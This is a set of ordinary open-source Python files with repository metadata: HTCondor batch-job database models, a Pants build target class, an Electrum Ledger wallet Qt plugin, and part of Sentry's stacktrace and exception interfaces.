def name(self, value):
self._name = value
@hybrid_property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@hybrid_property
def tags(self):
return self._tags
@tags.setter
def tags(self, value):
self._tags.append(value)
@hybrid_property
def algorithms(self):
return self._algorithms
@algorithms.setter
def algorithms(self, value):
self._algorithms.append(value)
@hybrid_property
def collections(self):
return self._collections
@collections.setter
def collections(self, value):
self._collections.append(value)
@hybrid_property
def batches(self):
return self._batches
@batches.setter
def batches(self, value):
self._batches.append(value)
class Batch(db.Model):
"""Represents a batch of jobs to be deployed on HTCondor"""
# Fields
id = db.Column(db.Integer, primary_key=True)
_name = db.Column(db.String(64), index=True, unique=True)
_description = db.Column(db.String(512), index=False, unique=False)
_params = db.Column(db.PickleType(), index=False, unique=False)
_memory = db.Column(db.Integer, index=False, unique=False)
_disk = db.Column(db.Integer, index=False, unique=False)
_flock = db.Column(db.Boolean(), index=False)
_glide = db.Column(db.Boolean(), index=False)
_arguments = db.Column(db.PickleType(), index=False, unique=False)
_kwargs = db.Column(db.PickleType(), index=False, unique=False)
_sweep = db.Column(db.String(64), index=False, unique=False)
_wrapper = db.Column(db.String(64), index=False, unique=False)
_submit_file = db.Column(db.String(64), index=False, unique=False)
_params_file = db.Column(db.String(64), index=False, unique=False)
_share_dir = db.Column(db.String(64), index=False, unique=False)
_results_dir = db.Column(db.String(64), index=False, unique=False)
_pre = db.Column(db.String(64), index=False, unique=False)
_post = db.Column(db.String(64), index=False, unique=False)
_job_pre = db.Column(db.String(64), index=False, unique=False)
_job_post = db.Column(db.String(64), index=False, unique=False)
_completed = db.Column(db.Boolean(), index=False)
# Relationships
""" TODO: Multi-User
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
"""
experiment_id = db.Column(db.Integer, db.ForeignKey('experiment.id'))
data_set_id = db.Column(db.Integer, db.ForeignKey('data_set.id'))
implementation_id = db.Column(db.Integer,
db.ForeignKey('implementation.id'))
_tags = db.relationship('Tag', secondary=batches_tags,
backref=db.backref('batches', lazy='dynamic'))
_jobs = db.relationship('Job', backref='batch', lazy='select')
def __init__(self,
experiment_id,
data_set_id,
implementation_id,
name,
description,
tags,
params,
memory,
disk,
flock,
glide,
arguments=None,
keyword_arguments=None,
sweep='sweep.dag',
wrapper='wrapper.sh',
submit_file='process.sub',
params_file='params.json',
share_directory='share',
results_directory='results',
pre_script=None,
job_pre_script=None,
post_script='batch_post.py',
job_post_script='job_post.py'):
super(Batch, self).__init__()
# Relationships
self.experiment_id = experiment_id
self.data_set_id = data_set_id
self.implementation_id = implementation_id
# Mandatory
self._name = name
self._description = description
self._tags = tags
self._params = params
self._jobs = [Job(batch_id=self.id, uid=uid, params=job_params)
for uid, job_params in enumerate(params)]
self._memory = memory
self._disk = disk
self._flock = flock
self._glide = glide
# Optional Arguments
self._pre = pre_script
self._post = post_script
self._job_pre = job_pre_script
self._job_post = job_post_script
self._arguments = arguments
self._kwargs = keyword_arguments
self._sweep = sweep
self._wrapper = wrapper
self._submit_file = submit_file
self._params_file = params_file
self._share_dir = share_directory
self._results_dir = results_directory
self._completed = False
def package(self): # TODO: Remove after, replace zip if exists,
"""Packages the files to run a batch of jobs into a directory"""
rootdir = makedir(
os.path.join(current_app.config['STAGING_AREA'], self.safe_name))
makedir(os.path.join(rootdir, self.results_dir))
sharedir = makedir(os.path.join(rootdir, self.share_dir))
self.write_template('sweep', os.path.join(rootdir, self.sweep))
self.write_params(rootdir)
self.write_template('wrapper', os.path.join(sharedir, self.wrapper))
for job in self.jobs: # Setup Job Directories
job.package(rootdir)
# self.write_template('batch_pre', os.path.join(sharedir, self.pre))
self.write_template('batch_post', os.path.join(sharedir, self.post))
# self.write_template('job_pre', os.path.join(sharedir, self.job_pre))
self.write_template('job_post', os.path.join(sharedir, self.job_post))
self.write_template('hack', os.path.join(sharedir, 'hack.sub'))
shutil.copy(os.path.join(current_app.config['STAGING_AREA'], 'hack'),
sharedir) # Copy fragile hack executable to share_dir
zipfile = rootdir + '.zip'
make_zipfile(zipfile, rootdir)
shutil.rmtree(rootdir) # clean up for next package
return os.path.basename(zipfile)
def write_params(self, rootdir):
""" Writes a dictionary to a json file """
filename = os.path.join(rootdir, self.params_file)
with open(filename, 'w') as writefile:
json.dump(self.params, writefile, sort_keys=True, indent=4)
def write_template(self, template, filename):
""" Renders a batch level tempalte and writes it to filename """
if filename:
with open(filename, 'w') as writefile:
writefile.write(render_template(template, batch=self))
@hybrid_property
def serialize(self):
return {'Name': self.name,
'Tags': [tag.name for tag in self.tags]}
@hybrid_property
def mongoize(self):
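        # Denormalize the batch together with its related experiment, data set,
        # collection, algorithm and implementation into a single document
        # (presumably for storage in MongoDB, as the name suggests).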
imp = Implementation.query.filter_by(id=self.implementation_id).first()
exp = Experiment.query.filter_by(id=self.experiment_id).first()
ds = DataSet.query.filter_by(id=self.data_set_id).first()
dc = DataCollection.query.filter_by(id=ds.data_collection_id).first()
alg = Algorithm.query.filter_by(id=imp._algorithm_id).first()
return {'Batch': self.serialize,
'Tags': [tag.name for tag in self.tags], # TODO: conglomerate
'Experiment': exp.serialize,
'DataSet': ds.serialize,
'DataCollection': dc.serialize,
'Algorithm': alg.serialize,
'Implementation': imp.serialize}
@hybrid_property
def safe_name(self):
"""Remove non-word characters & replace whitespace with underscore"""
return re.sub(r"\s+", '_', re.sub(r"[^\w\s]", '', self.name))
@hybrid_property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@hybrid_property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@hybrid_property
def tags(self):
return self._tags
@tags.setter
def tags(self, value):
self._tags.append(value)
@hybrid_property
def jobs(self):
return self._jobs
@jobs.setter
def jobs(self, value):
self._jobs.append(value)
@hybrid_property
def params(self):
return self._params
@params.setter
def params(self, value):
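        # Note: yaml.load() without an explicit Loader can construct arbitrary
        # Python objects; yaml.safe_load() is the safer choice for untrusted input.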
self._params = yaml.load(value) # TODO: Validate
@hybrid_property
def memory(self):
return self._memory
@memory.setter
def memory(self, value):
self._memory = value
@hybrid_property
def disk(self):
return self._disk
@disk.setter
def disk(self, value):
self._disk = value
@hybrid_property
def flock(self):
return self._flock
@flock.setter
def flock(self, value):
self._flock = value
@hybrid_property
def glide(self):
return self._glide
@hybrid_property
def pre(self):
return self._pre
@pre.setter
def pre(self, value):
self._pre = value
@hybrid_property
def post(self):
return self._post
@post.setter
def post(self, value):
self._post = value
@hybrid_property
def job_pre(self):
return self._job_pre
@job_pre.setter
def job_pre(self, value):
self._job_pre = value
@hybrid_property
def job_post(self):
return self._job_post
@job_post.setter
def job_post(self, value):
self._job_post = value
@hybrid_property
def args(self):
return self._arguments
@args.setter
def args(self, value):
self._arguments = value
@hybrid_property
def kwargs(self):
return self._kwargs
@kwargs.setter
def kwargs(self, value):
self._kwargs = value
@hybrid_property
def sweep(self):
return self._sweep
@sweep.setter
def sweep(self, value):
self._sweep = value
@hybrid_property
def wrapper(self):
return self._wrapper
@wrapper.setter
def wrapper(self, value):
self._wrapper = value
@hybrid_property
def submit_file(self):
return self._submit_file
@submit_file.setter
def submit_file(self, value):
self._submit_file = value
@hybrid_property
def params_file(self):
return self._params_file
@params_file.setter
def params_file(self, value):
self._params_file = value
@hybrid_property
def share_dir(self):
return self._share_dir
@share_dir.setter
def share_dir(self, value):
self._share_dir = value
@hybrid_property
def results_dir(self):
return self._results_dir
@results_dir.setter
def results_dir(self, value):
self._results_dir = value
@hybrid_property
def size(self):
return len(self._jobs)
@hybrid_property
def completed(self):
return self._completed
@completed.setter
def completed(self, value):
self._completed = value
class Job(db.Model):
"""Represents a single job, belonging to a Batch"""
# Fields
id = db.Column(db.Integer, primary_key=True)
_uid = db.Column(db.Integer, index=True, unique=False)
_params = db.Column(db.PickleType(), index=True, unique=False)
# Relationships
batch_id = db.Column(db.Integer, db.ForeignKey('batch.id'))
""" TODO: Multi-User
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
"""
def __init__(self, batch_id, uid, params):
super(Job, self).__init__()
self.batch_id = batch_id
self._uid = uid
self._params = params
def package(self, rootdir):
"""Packages files to run a job into a directory in rootdir"""
jobdir = makedir(os.path.join(rootdir, self.uid))
self.write_params(jobdir)
self.write_template('process', os.path.join(jobdir, self.submit_file))
self.write_template('subdag', os.path.join(jobdir, self.subdag))
def write_params(self, jobdir):
""" Writes a dictionary to a json file """
filename = os.path.join(jobdir, self.params_file)
with open(filename, 'w') as writefile:
json.dump(self.params, writefile, sort_keys=True, indent=4)
def write_template(self, template, filename):
""" Renders a batch level tempalte and writes it to filename """
if filename:
with open(filename, 'w') as writefile:
writefile.write(render_template(template, job=self))
@hybrid_property
def uid(self):
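        # Zero-pad to the width of the largest job index in the batch,
        # e.g. uid 7 in a 100-job batch -> "07".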
return str(self._uid).zfill(len(str(self.batch.size-1)))
@uid.setter
def uid(self, value):
self._uid = value
@hybrid_property
def params(self):
return self._params
@params.setter
def params(self, value):
self._params = value
@hybrid_property
def params_file(self):
return self.batch.params_file
@hybrid_property
def memory(self):
return self.batch.memory
@hybrid_property
def disk(self):
return self.batch.disk
@hybrid_property
def flock(self):
return self.batch.flock
@hybrid_property
def glide(self):
return self.batch.glide
@hybrid_property
def args(self):
return self.batch.args
@hybrid_property
def kwargs(self):
return self.batch.kwargs
@hybrid_property
def wrapper(self):
return self.batch.wrapper
@hybrid_property
def submit_file(self):
return self.batch.submit_file
@hybrid_property
def subdag(self):
return self.uid + '.dag'
@hybrid_property
def share_dir(self):
return self.batch.share_dir
@hybrid_property
def results_dir(self):
return self.batch.results_dir
@hybrid_property
def pre(self):
return self.batch.job_pre
@hybrid_property
def post(self):
return self.batch.job_post
@hybrid_property
def batch_name(self):
return self.batch.safe_name
@hybrid_property
def tags(self):
return self.batch.tags
""" TODO: Parameter Validation
class Argument(db.Model):
Entity representing a single valid argument
belonging to an implementation of an algorithm
# Fields
id = db.Column(db.Integer,
primary_key=True)
_name = db.Column(db.String(64),
index=True,
unique=True)
_data_type = db.Column(db.Enum('int', 'float', 'string', 'enum'),
index=True,
unique=False)
_optional = db.Column(db.Boolean(),
index=True)
# Relationships
implementation_id = db.Column(db.Integer,
db.ForeignKey('implementation.id'))
def __init__(self, implementation_id, name, data_type, optional):
super(Argument, self).__init__()
self.implementation_id = implementation_id
self._name = name
self._data_type = data_type
self._optional = optional
@hybrid_property
def serialize(self):
return {'id': self.id,
'name': self.name,
'data type': self.data_type,
'optional': self.optional}
@hybrid_property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@hybrid_property
def data_type(self):
return self._data_type
@data_type.setter
def data_type(self, value):
self._data_type = value
@hybrid_property
def optional(self):
return self._optional
@optional.setter
def optional(self, value):
self._optional = value
"""
class URL(db.Model):
# Fields
id = db.Column(db.Integer, primary_key=True)
_url = db.Column(db.String(124), index=False, unique=False)
# Relationships
data_set_id = db.Column(db.Integer, db.ForeignKey('data_set.id'))
implementation_id = db.Column(db.Integer,
db.ForeignKey('implementation.id'))
def __init__(self, url, data_set_id=None, implementation_id=None):
self._url = url
self.data_set_id = data_set_id
self.implementation_id = implementation_id
@hybrid_property
def url(self):
return self._url
@url.setter
def url(self, value):
self._url = value
# Universal Functions
def makedir(dirname):
""" Creates a directory if it doesn't already exist """
if not os.path.isdir(dirname):
os.makedirs(dirname)
return dirname
def make_zipfile(output_filename, source_dir):
"""http://stackoverflow.com/questions/1855095/"""
relroot = os.path.abspath(os.path.join(source_dir, os.pardir))
with zipfile.ZipFile(output_filename, "w",
zipfile.ZIP_DEFLATED, True) as zip:
for root, dirs, files in os.walk(source_dir):
# add directory (needed for empty dirs)
zip.write(root, os.path.relpath(root, relroot))
for file in files:
filename = os.path.join(root, file)
                os.chmod(filename, 0o755)
if os.path.isfile(filename): # regular files only
arcname = os.path.join(os.path.relpath(root, relroot), file)
zip.write(filename, arcname)
|
bsd-3-clause
| -587,099,930,290,131,300
| 28.360393
| 80
| 0.599824
| false
| 3.965422
| false
| false
| false
|
digwanderlust/pants
|
src/python/pants/base/target_addressable.py
|
1
|
2168
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from six import string_types
from pants.base.addressable import Addressable
from pants.base.deprecated import deprecated
from pants.base.exceptions import TargetDefinitionException
class TargetAddressable(Addressable):
@classmethod
def get_target_type(cls):
    raise NotImplementedError()
def __init__(self, *args, **kwargs):
self.target_type = self.get_target_type()
if 'name' not in kwargs:
raise Addressable.AddressableInitError(
'name is a required parameter to all Targets specified within a BUILD file.'
' Target type was: {target_type}.'
.format(target_type=self.target_type))
if args:
raise Addressable.AddressableInitError(
'All arguments passed to Targets within BUILD files must use explicit keyword syntax.'
' Target type was: {target_type}.'
' Arguments passed were: {args}'
.format(target_type=self.target_type, args=args))
self.kwargs = kwargs
self.name = kwargs['name']
self.dependency_specs = self.kwargs.pop('dependencies', [])
for dep_spec in self.dependency_specs:
if not isinstance(dep_spec, string_types):
msg = ('dependencies passed to Target constructors must be strings. {dep_spec} is not'
' a string. Target type was: {target_type}.'
.format(target_type=self.target_type, dep_spec=dep_spec))
raise TargetDefinitionException(target=self, msg=msg)
@property
def addressable_name(self):
return self.name
def __str__(self):
format_str = 'TargetAddressable(target_type={target_type}, name={name}, **kwargs=...)'
return format_str.format(target_type=self.target_type, name=self.name)
def __repr__(self):
format_str = 'TargetAddressable(target_type={target_type}, kwargs={kwargs})'
return format_str.format(target_type=self.target_type, kwargs=self.kwargs)
|
apache-2.0
| 9,125,159,257,805,332,000
| 37.035088
| 95
| 0.690959
| false
| 3.89228
| false
| false
| false
|
cryptapus/electrum-myr
|
plugins/ledger/qt.py
|
1
|
2181
|
import threading
from PyQt4.Qt import (QDialog, QInputDialog, QLineEdit,
QVBoxLayout, QLabel, SIGNAL)
import PyQt4.QtCore as QtCore
from electrum.i18n import _
from .ledger import LedgerPlugin
from ..hw_wallet.qt import QtHandlerBase, QtPluginBase
from electrum_gui.qt.util import *
from btchip.btchipPersoWizard import StartBTChipPersoDialog
class Plugin(LedgerPlugin, QtPluginBase):
icon_unpaired = ":icons/ledger_unpaired.png"
icon_paired = ":icons/ledger.png"
def create_handler(self, window):
return Ledger_Handler(window)
class Ledger_Handler(QtHandlerBase):
setup_signal = pyqtSignal()
auth_signal = pyqtSignal(object)
def __init__(self, win):
super(Ledger_Handler, self).__init__(win, 'Ledger')
self.setup_signal.connect(self.setup_dialog)
self.auth_signal.connect(self.auth_dialog)
def word_dialog(self, msg):
response = QInputDialog.getText(self.top_level_window(), "Ledger Wallet Authentication", msg, QLineEdit.Password)
if not response[1]:
self.word = None
else:
self.word = str(response[0])
self.done.set()
def message_dialog(self, msg):
self.clear_dialog()
self.dialog = dialog = WindowModalDialog(self.top_level_window(), _("Ledger Status"))
l = QLabel(msg)
vbox = QVBoxLayout(dialog)
vbox.addWidget(l)
dialog.show()
def auth_dialog(self, data):
try:
from .auth2fa import LedgerAuthDialog
except ImportError as e:
self.message_dialog(e)
return
dialog = LedgerAuthDialog(self, data)
dialog.exec_()
self.word = dialog.pin
self.done.set()
def get_auth(self, data):
self.done.clear()
self.auth_signal.emit(data)
self.done.wait()
return self.word
def get_setup(self):
self.done.clear()
self.setup_signal.emit()
self.done.wait()
return
def setup_dialog(self):
dialog = StartBTChipPersoDialog()
dialog.exec_()
|
mit
| 870,677,349,423,049,600
| 27.324675
| 121
| 0.607519
| false
| 3.740995
| false
| false
| false
|
beni55/sentry
|
src/sentry/interfaces.py
|
1
|
35445
|
"""
sentry.interfaces
~~~~~~~~~~~~~~~~~
Interfaces provide an abstraction for how structured data should be
validated and rendered.
:copyright: (c) 2010-2013 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import itertools
import urlparse
import warnings
from pygments import highlight
# from pygments.lexers import get_lexer_for_filename, TextLexer, ClassNotFound
from pygments.lexers import TextLexer
from pygments.formatters import HtmlFormatter
from django.http import QueryDict
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from sentry.app import env
from sentry.models import UserOption
from sentry.utils.strings import strip
from sentry.web.helpers import render_to_string
_Exception = Exception
def unserialize(klass, data):
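    # Recreate an interface instance without calling __init__; the saved state is
    # restored through __setstate__.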
value = object.__new__(klass)
value.__setstate__(data)
return value
def is_url(filename):
return filename.startswith(('http:', 'https:', 'file:'))
def get_context(lineno, context_line, pre_context=None, post_context=None, filename=None,
format=False):
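    # Returns a list of (lineno, source_line) pairs spanning pre_context, the
    # context_line itself and post_context; lines are highlighted to HTML when
    # format=True.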
lineno = int(lineno)
context = []
start_lineno = lineno - len(pre_context or [])
if pre_context:
start_lineno = lineno - len(pre_context)
at_lineno = start_lineno
for line in pre_context:
context.append((at_lineno, line))
at_lineno += 1
else:
start_lineno = lineno
at_lineno = lineno
if start_lineno < 0:
start_lineno = 0
context.append((at_lineno, context_line))
at_lineno += 1
if post_context:
for line in post_context:
context.append((at_lineno, line))
at_lineno += 1
# HACK:
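    # (treat extension-less URL paths as index.html; presumably so a lexer could be
    #  guessed from the filename when highlighting by filename was enabled)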
if filename and is_url(filename) and '.' not in filename.rsplit('/', 1)[-1]:
filename = 'index.html'
if format:
# try:
# lexer = get_lexer_for_filename(filename)
# except ClassNotFound:
# lexer = TextLexer()
lexer = TextLexer()
formatter = HtmlFormatter()
def format(line):
if not line:
return mark_safe('<pre></pre>')
return mark_safe(highlight(line, lexer, formatter))
context = tuple((n, format(l)) for n, l in context)
return context
def is_newest_frame_first(event):
newest_first = event.platform not in ('python', None)
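    # Python tracebacks conventionally read oldest call first; other platforms
    # default to newest first. The per-user "stacktrace_order" option overrides this.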
if env.request and env.request.user.is_authenticated():
display = UserOption.objects.get_value(
user=env.request.user,
project=None,
key='stacktrace_order',
default=None,
)
if display == '1':
newest_first = False
elif display == '2':
newest_first = True
return newest_first
class Interface(object):
"""
An interface is a structured representation of data, which may
render differently than the default ``extra`` metadata in an event.
"""
score = 0
display_score = None
def __init__(self, **kwargs):
self.attrs = kwargs.keys()
self.__dict__.update(kwargs)
def __eq__(self, other):
if type(self) != type(other):
return False
return self.serialize() == other.serialize()
def __setstate__(self, data):
kwargs = self.unserialize(data)
self.attrs = kwargs.keys()
self.__dict__.update(kwargs)
def __getstate__(self):
return self.serialize()
def validate(self):
pass
def unserialize(self, data):
return data
def serialize(self):
return dict((k, self.__dict__[k]) for k in self.attrs)
def get_composite_hash(self, interfaces):
return self.get_hash()
def get_hash(self):
return []
def to_html(self, event, is_public=False, **kwargs):
return ''
def to_string(self, event, is_public=False, **kwargs):
return ''
def get_slug(self):
return type(self).__name__.lower()
def get_title(self):
return _(type(self).__name__)
def get_display_score(self):
return self.display_score or self.score
def get_score(self):
return self.score
def get_search_context(self, event):
"""
Returns a dictionary describing the data that should be indexed
by the search engine. Several fields are accepted:
- text: a list of text items to index as part of the generic query
- filters: a map of fields which are used for precise matching
"""
return {
# 'text': ['...'],
# 'filters': {
# 'field": ['...'],
# },
}
class Message(Interface):
"""
A standard message consisting of a ``message`` arg, and an optional
``params`` arg for formatting.
If your message cannot be parameterized, then the message interface
will serve no benefit.
- ``message`` must be no more than 1000 characters in length.
>>> {
>>> "message": "My raw message with interpreted strings like %s",
>>> "params": ["this"]
>>> }
"""
attrs = ('message', 'params')
def __init__(self, message, params=(), **kwargs):
self.message = message
self.params = params
def validate(self):
assert len(self.message) <= 5000
def serialize(self):
return {
'message': self.message,
'params': self.params,
}
def get_hash(self):
return [self.message]
def get_search_context(self, event):
if isinstance(self.params, (list, tuple)):
params = list(self.params)
elif isinstance(self.params, dict):
params = self.params.values()
else:
params = []
return {
'text': [self.message] + params,
}
class Query(Interface):
"""
A SQL query with an optional string describing the SQL driver, ``engine``.
>>> {
>>> "query": "SELECT 1"
>>> "engine": "psycopg2"
>>> }
"""
attrs = ('query', 'engine')
def __init__(self, query, engine=None, **kwargs):
self.query = query
self.engine = engine
def get_hash(self):
return [self.query]
def serialize(self):
return {
'query': self.query,
'engine': self.engine,
}
def get_search_context(self, event):
return {
'text': [self.query],
}
class Frame(object):
attrs = ('abs_path', 'filename', 'lineno', 'colno', 'in_app', 'context_line',
'pre_context', 'post_context', 'vars', 'module', 'function', 'data')
def __init__(self, abs_path=None, filename=None, lineno=None, colno=None,
in_app=None, context_line=None, pre_context=(),
post_context=(), vars=None, module=None, function=None,
data=None, **kwargs):
self.abs_path = abs_path or filename
self.filename = filename or abs_path
if self.is_url():
urlparts = urlparse.urlparse(self.abs_path)
if urlparts.path:
self.filename = urlparts.path
self.module = module
self.function = function
if lineno is not None:
self.lineno = int(lineno)
else:
self.lineno = None
if colno is not None:
self.colno = int(colno)
else:
self.colno = None
self.in_app = in_app
self.context_line = context_line
self.pre_context = pre_context
self.post_context = post_context
self.vars = vars or {}
self.data = data or {}
def __getitem__(self, key):
warnings.warn('Frame[key] is deprecated. Use Frame.key instead.', DeprecationWarning)
return getattr(self, key)
def is_url(self):
if not self.abs_path:
return False
return is_url(self.abs_path)
def is_valid(self):
if self.in_app not in (False, True, None):
return False
if type(self.vars) != dict:
return False
if type(self.data) != dict:
return False
return self.filename or self.function or self.module
def get_hash(self):
output = []
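        # Prefer the module over a non-URL filename, then add the context line when
        # available; otherwise fall back to the function name or line number.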
if self.module:
output.append(self.module)
elif self.filename and not self.is_url():
output.append(self.filename)
if self.context_line is not None:
output.append(self.context_line)
elif not output:
# If we were unable to achieve any context at this point
# (likely due to a bad JavaScript error) we should just
# bail on recording this frame
return output
elif self.function:
output.append(self.function)
elif self.lineno is not None:
output.append(self.lineno)
return output
def get_context(self, event, is_public=False, **kwargs):
if (self.context_line and self.lineno is not None
and (self.pre_context or self.post_context)):
context = get_context(
lineno=self.lineno,
context_line=self.context_line,
pre_context=self.pre_context,
post_context=self.post_context,
filename=self.filename or self.module,
format=True,
)
start_lineno = context[0][0]
else:
context = []
start_lineno = None
frame_data = {
'abs_path': self.abs_path,
'filename': self.filename,
'module': self.module,
'function': self.function,
'start_lineno': start_lineno,
'lineno': self.lineno,
'context': context,
'context_line': self.context_line,
'in_app': self.in_app,
'is_url': self.is_url(),
}
if not is_public:
frame_data['vars'] = self.vars or {}
if event.platform == 'javascript' and self.data:
frame_data.update({
'sourcemap': self.data['sourcemap'].rsplit('/', 1)[-1],
'sourcemap_url': urlparse.urljoin(self.abs_path, self.data['sourcemap']),
'orig_function': self.data['orig_function'],
'orig_filename': self.data['orig_filename'],
'orig_lineno': self.data['orig_lineno'],
'orig_colno': self.data['orig_colno'],
})
return frame_data
def to_string(self, event):
if event.platform is not None:
choices = [event.platform]
else:
choices = []
choices.append('default')
templates = [
'sentry/partial/frames/%s.txt' % choice
for choice in choices
]
return render_to_string(templates, {
'abs_path': self.abs_path,
'filename': self.filename,
'function': self.function,
'module': self.module,
'lineno': self.lineno,
'colno': self.colno,
'context_line': self.context_line,
}).strip('\n')
class Stacktrace(Interface):
"""
A stacktrace contains a list of frames, each with various bits (most optional)
describing the context of that frame. Frames should be sorted from oldest
to newest.
The stacktrace contains one element, ``frames``, which is a list of hashes. Each
hash must contain **at least** the ``filename`` attribute. The rest of the values
are optional, but recommended.
The list of frames should be ordered by the oldest call first.
Each frame must contain the following attributes:
``filename``
The relative filepath to the call
OR
``function``
The name of the function being called
OR
``module``
Platform-specific module path (e.g. sentry.interfaces.Stacktrace)
The following additional attributes are supported:
``lineno``
The line number of the call
``colno``
The column number of the call
``abs_path``
The absolute path to filename
``context_line``
Source code in filename at lineno
``pre_context``
A list of source code lines before context_line (in order) -- usually [lineno - 5:lineno]
``post_context``
A list of source code lines after context_line (in order) -- usually [lineno + 1:lineno + 5]
``in_app``
Signifies whether this frame is related to the execution of the relevant code in this stacktrace. For example,
the frames that might power the framework's webserver of your app are probably not relevant, however calls to
the framework's library once you start handling code likely are.
``vars``
A mapping of variables which were available within this frame (usually context-locals).
>>> {
>>> "frames": [{
>>> "abs_path": "/real/file/name.py"
>>> "filename": "file/name.py",
>>> "function": "myfunction",
>>> "vars": {
>>> "key": "value"
>>> },
>>> "pre_context": [
>>> "line1",
>>> "line2"
>>> ],
>>> "context_line": "line3",
>>> "lineno": 3,
>>> "in_app": true,
>>> "post_context": [
>>> "line4",
>>> "line5"
>>> ],
>>> }]
>>> }
.. note:: This interface can be passed as the 'stacktrace' key in addition
to the full interface path.
"""
attrs = ('frames',)
score = 1000
def __init__(self, frames, **kwargs):
self.frames = [Frame(**f) for f in frames]
def __iter__(self):
return iter(self.frames)
def validate(self):
for frame in self.frames:
# ensure we've got the correct required values
assert frame.is_valid()
def serialize(self):
frames = []
for f in self.frames:
# compatibility with old serialization
if isinstance(f, Frame):
frames.append(vars(f))
else:
frames.append(f)
return {
'frames': frames,
}
def has_app_frames(self):
return any(f.in_app is not None for f in self.frames)
def unserialize(self, data):
data['frames'] = [Frame(**f) for f in data.pop('frames', [])]
return data
def get_composite_hash(self, interfaces):
output = self.get_hash()
if 'sentry.interfaces.Exception' in interfaces:
exc = interfaces['sentry.interfaces.Exception'][0]
if exc.type:
output.append(exc.type)
elif not output:
output = exc.get_hash()
return output
def get_hash(self):
output = []
for frame in self.frames:
output.extend(frame.get_hash())
return output
def get_context(self, event, is_public=False, newest_first=None,
with_stacktrace=True, **kwargs):
system_frames = 0
frames = []
for frame in self.frames:
frames.append(frame.get_context(event=event, is_public=is_public))
if not frame.in_app:
system_frames += 1
if len(frames) == system_frames:
system_frames = 0
        # if there are no system frames, pretend they're all part of the app
if not system_frames:
for frame in frames:
frame['in_app'] = True
if newest_first is None:
newest_first = is_newest_frame_first(event)
if newest_first:
frames = frames[::-1]
context = {
'is_public': is_public,
'newest_first': newest_first,
'system_frames': system_frames,
'event': event,
'frames': frames,
'stack_id': 'stacktrace_1',
}
if with_stacktrace:
context['stacktrace'] = self.get_traceback(event, newest_first=newest_first)
return context
def to_html(self, event, **kwargs):
context = self.get_context(
event=event,
**kwargs
)
return render_to_string('sentry/partial/interfaces/stacktrace.html', context)
def to_string(self, event, is_public=False, **kwargs):
return self.get_stacktrace(event, system_frames=False, max_frames=5)
def get_stacktrace(self, event, system_frames=True, newest_first=None, max_frames=None):
if newest_first is None:
newest_first = is_newest_frame_first(event)
result = []
if newest_first:
result.append(_('Stacktrace (most recent call first):'))
else:
result.append(_('Stacktrace (most recent call last):'))
result.append('')
frames = self.frames
num_frames = len(frames)
if not system_frames:
frames = [f for f in frames if f.in_app is not False]
if not frames:
frames = self.frames
if newest_first:
frames = frames[::-1]
if max_frames:
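            # Keep the max_frames frames closest to the crash: the head of the list
            # when newest-first, the tail when oldest-first.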
visible_frames = max_frames
if newest_first:
start, stop = None, max_frames
else:
start, stop = -max_frames, None
else:
visible_frames = len(frames)
start, stop = None, None
if not newest_first and visible_frames < num_frames:
result.extend(('(%d additional frame(s) were not displayed)' % (num_frames - visible_frames,), '...'))
for frame in frames[start:stop]:
result.append(frame.to_string(event))
if newest_first and visible_frames < num_frames:
result.extend(('...', '(%d additional frame(s) were not displayed)' % (num_frames - visible_frames,)))
return '\n'.join(result)
def get_traceback(self, event, newest_first=None):
result = [
event.message, '',
self.get_stacktrace(event, newest_first=newest_first),
]
return '\n'.join(result)
def get_search_context(self, event):
return {
'text': list(itertools.chain(*[[f.filename, f.function, f.context_line] for f in self.frames])),
}
class SingleException(Interface):
"""
A standard exception with a mandatory ``value`` argument, and optional
    ``type`` and ``module`` arguments describing the exception class type and
module namespace.
You can also optionally bind a stacktrace interface to an exception. The
spec is identical to ``sentry.interfaces.Stacktrace``.
>>> {
>>> "type": "ValueError",
>>> "value": "My exception value",
>>> "module": "__builtins__"
>>> "stacktrace": {
>>> # see sentry.interfaces.Stacktrace
>>> }
>>> }
"""
attrs = ('value', 'type', 'module', 'stacktrace')
score = 900
display_score = 1200
def __init__(self, value, type=None, module=None, stacktrace=None, **kwargs):
# A human readable value for the exception
self.value = value
# The exception type name (e.g. TypeError)
self.type = type
# Optional module of the exception type (e.g. __builtin__)
self.module = module
# Optional bound stacktrace interface
if stacktrace:
self.stacktrace = Stacktrace(**stacktrace)
else:
self.stacktrace = None
def validate(self):
if self.stacktrace:
return self.stacktrace.validate()
def serialize(self):
if self.stacktrace:
stacktrace = self.stacktrace.serialize()
else:
stacktrace = None
return {
'type': strip(self.type) or None,
'value': strip(self.value) or None,
'module': strip(self.module) or None,
'stacktrace': stacktrace,
}
def unserialize(self, data):
if data.get('stacktrace'):
data['stacktrace'] = unserialize(Stacktrace, data['stacktrace'])
else:
data['stacktrace'] = None
return data
def get_hash(self):
output = None
if self.stacktrace:
output = self.stacktrace.get_hash()
if output and self.type:
output.append(self.type)
if not output:
output = filter(bool, [self.type, self.value])
return output
def get_context(self, event, is_public=False, **kwargs):
last_frame = None
interface = event.interfaces.get('sentry.interfaces.Stacktrace')
if interface is not None and interface.frames:
last_frame = interface.frames[-1]
e_module = strip(self.module)
e_type = strip(self.type) or 'Exception'
e_value = strip(self.value)
if self.module:
fullname = '%s.%s' % (e_module, e_type)
else:
fullname = e_type
return {
'is_public': is_public,
'event': event,
'exception_value': e_value or e_type or '<empty value>',
'exception_type': e_type,
'exception_module': e_module,
'fullname': fullname,
'last_frame': last_frame
}
def get_search_context(self, event):
return {
'text': [self.value, self.type, self.module]
}
class Exception(Interface):
"""
An exception consists of a list of values. In most cases, this list
contains a single exception, with an optional stacktrace interface.
Each exception has a mandatory ``value`` argument and optional ``type`` and
``module`` arguments describing the exception class type and module
namespace.
You can also optionally bind a stacktrace interface to an exception. The
spec is identical to ``sentry.interfaces.Stacktrace``.
>>> [{
>>> "type": "ValueError",
>>> "value": "My exception value",
>>> "module": "__builtins__"
>>> "stacktrace": {
>>> # see sentry.interfaces.Stacktrace
